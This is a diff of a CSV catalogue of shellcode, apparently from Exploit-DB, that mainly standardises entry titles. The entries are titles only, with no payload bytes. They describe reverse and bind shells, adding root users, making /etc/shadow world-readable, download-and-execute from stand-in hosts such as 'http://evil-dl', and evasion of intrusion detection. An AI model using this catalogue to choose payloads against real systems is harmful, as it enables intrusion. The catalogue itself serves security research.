+13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86 13366,shellcodes/linux_x86/13366.txt,"Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,linux_x86 -13367,shellcodes/linux_x86/13367.c,"Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86 -13368,shellcodes/linux_x86/13368.c,"Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,linux_x86 -13369,shellcodes/linux_x86/13369.c,"Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86 -13370,shellcodes/linux_x86/13370.c,"Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,linux_x86 +13367,shellcodes/linux_x86/13367.c,"Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86 +13368,shellcodes/linux_x86/13368.c,"Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,linux_x86 +13369,shellcodes/linux_x86/13369.c,"Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86 +13370,shellcodes/linux_x86/13370.c,"Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,linux_x86 13371,shellcodes/linux_x86/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86 13372,shellcodes/linux_x86/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86 13373,shellcodes/linux_x86/13373.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86 @@ -137,11 +137,11 @@ id,file,description,date,author,type,platform 13379,shellcodes/linux_x86/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86 13380,shellcodes/linux_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,linux_x86 13381,shellcodes/linux_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,linux_x86 -13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86 -13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86 -13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86 +13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86 +13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86 +13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86 13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86 -13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86 +13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86 13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86 13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86 13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86 @@ -153,8 +153,8 @@ id,file,description,date,author,type,platform 13395,shellcodes/linux_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,linux_x86 13396,shellcodes/linux_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86 13397,shellcodes/linux_x86/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,shellcode,linux_x86 -13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86 -13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86 +13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86 +13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86 13400,shellcodes/linux_x86/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,shellcode,linux_x86 13401,shellcodes/generator/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,shellcode,generator 13402,shellcodes/linux_x86/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,shellcode,linux_x86 @@ -164,28 +164,28 @@ id,file,description,date,author,type,platform 13406,shellcodes/linux_x86/13406.c,"Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86 13407,shellcodes/linux_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12) + Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86 13408,shellcodes/linux_x86/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,linux_x86 -13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,linux_x86 +13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve(/bin/sh) Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,linux_x86 13410,shellcodes/linux_x86/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,shellcode,linux_x86 13411,shellcodes/linux_x86/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,shellcode,linux_x86 -13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86 -13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86 -13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86 -13415,shellcodes/linux_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)",2005-07-11,Okti,shellcode,linux_x86 +13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86 +13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86 +13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86 +13415,shellcodes/linux_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes)",2005-07-11,Okti,shellcode,linux_x86 13416,shellcodes/linux_x86/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,shellcode,linux_x86 -13417,shellcodes/linux_x86/13417.c,"Linux/x86 - setreuid + execve Shellcode (31 bytes)",2004-12-26,oc192,shellcode,linux_x86 +13417,shellcodes/linux_x86/13417.c,"Linux/x86 - setreuid() + execve() Shellcode (31 bytes)",2004-12-26,oc192,shellcode,linux_x86 13418,shellcodes/linux_x86/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,shellcode,linux_x86 13419,shellcodes/linux_x86/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,shellcode,linux_x86 13420,shellcodes/linux_x86/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,shellcode,linux_x86 13421,shellcodes/linux_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,linux_x86 -13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86 +13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve() Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86 13423,shellcodes/linux_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)",2004-11-15,zasta,shellcode,linux_x86 -13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 -13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86 -13426,shellcodes/linux_x86/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,linux_x86 +13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve(/bin/sh) Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 +13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86 +13426,shellcodes/bsd_x86/13426.c,"BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86 -13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 -13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 -13430,shellcodes/linux_x86/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,linux_x86 +13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) + Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 +13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow + Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 +13430,shellcodes/bsd_x86/13430.c,"BSD/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13431,shellcodes/linux_x86/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,shellcode,linux_x86 13432,shellcodes/linux_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,linux_x86 13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86 @@ -198,66 +198,67 @@ id,file,description,date,author,type,platform 13440,shellcodes/linux_x86/13440.c,"Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 13441,shellcodes/linux_x86/13441.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)",2004-09-26,Sp4rK,shellcode,linux_x86 13442,shellcodes/linux_x86/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 -13443,shellcodes/linux_x86/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 -13444,shellcodes/linux_x86/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 -13445,shellcodes/linux_x86/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 -13446,shellcodes/linux_x86/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 -13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,linux_x86 +13443,shellcodes/linux_x86/13443.c,"Linux/x86 - execve(/bin/sh) Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13444,shellcodes/linux_x86/13444.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (3)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13445,shellcodes/linux_x86/13445.c,"Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13446,shellcodes/linux_x86/13446.c,"Linux/x86 - execve(/bin/sh) Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,linux_x86 13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 13450,shellcodes/linux_x86/13450.c,"Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 13451,shellcodes/linux_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",shellcode,linux_x86 -13452,shellcodes/linux_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)",2004-09-12,dev0id,shellcode,linux_x86 -13453,shellcodes/linux_x86/13453.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,shellcode,linux_x86 -13454,shellcodes/linux_x86/13454.c,"Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,shellcode,linux_x86 -13455,shellcodes/linux_x86/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 -13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86 -13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86 -13458,shellcodes/linux_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,linux_x86 -13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86 +13452,shellcodes/linux_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes)",2004-09-12,dev0id,shellcode,linux_x86 +43633,shellcodes/openbsd_x86/43633.c,"OpenBSD/x86 - Load Kernel Module (/tmp/o.o) Shellcode (66 bytes)",2009-01-01,dev0id,shellcode,openbsd_x86 +13453,shellcodes/bsd_x86/13453.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,shellcode,bsd_x86 +13454,shellcodes/linux_x86/13454.c,"Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes)",2004-09-12,preedator,shellcode,linux_x86 +13455,shellcodes/linux_x86/13455.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86 +13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86 +13458,shellcodes/linux_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,linux_x86 +13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86 13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86 -13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86 +13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86 13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64 -13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64 +13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64 13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",shellcode,multiple 13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple -13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,shellcode,multiple -13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,shellcode,multiple -13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple +13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve(/bin/sh) Shellcode (141 bytes)",2004-09-12,dymitri,shellcode,multiple +13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve(/bin/sh) Shellcode (80 bytes)",2004-09-12,dymitri,shellcode,multiple +13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple 13470,shellcodes/netbsd_x86/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,shellcode,netbsd_x86 13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 -13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86 -13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86 +13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86 +13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86 13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86 13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86 13478,shellcodes/osx_ppc/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,shellcode,osx_ppc 13479,shellcodes/osx_ppc/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,shellcode,osx_ppc 13480,shellcodes/osx_ppc/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc -13481,shellcodes/osx_ppc/13481.c,"OSX/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13481,shellcodes/osx_ppc/13481.c,"OSX/PPC - execve(/bin/sh) Shellcode (72 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc 13482,shellcodes/osx_ppc/13482.c,"OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc 13483,shellcodes/osx_ppc/13483.c,"OSX/PPC - Reboot Shellcode (28 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc -13484,shellcodes/osx_ppc/13484.c,"OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13484,shellcodes/osx_ppc/13484.c,"OSX/PPC - setuid(0) + execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc 13485,shellcodes/osx_ppc/13485.c,"OSX/PPC - Create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc 13486,shellcodes/osx_ppc/13486.c,"OSX/PPC - Simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc -13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc 13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86 -13489,shellcodes/solaris_sparc/13489.c,"Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_sparc +13489,shellcodes/solaris_mips/13489.c,"Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_mips 13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc -13491,shellcodes/generator/13491.c,"Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator -13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc +13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator +13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc 13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc -13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc -13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc -13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc +13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc +13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc +13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc 13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc 13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator -13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 +13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 -13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 -13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 -13503,shellcodes/unixware/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware +13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve(/bin/sh) ToUpper 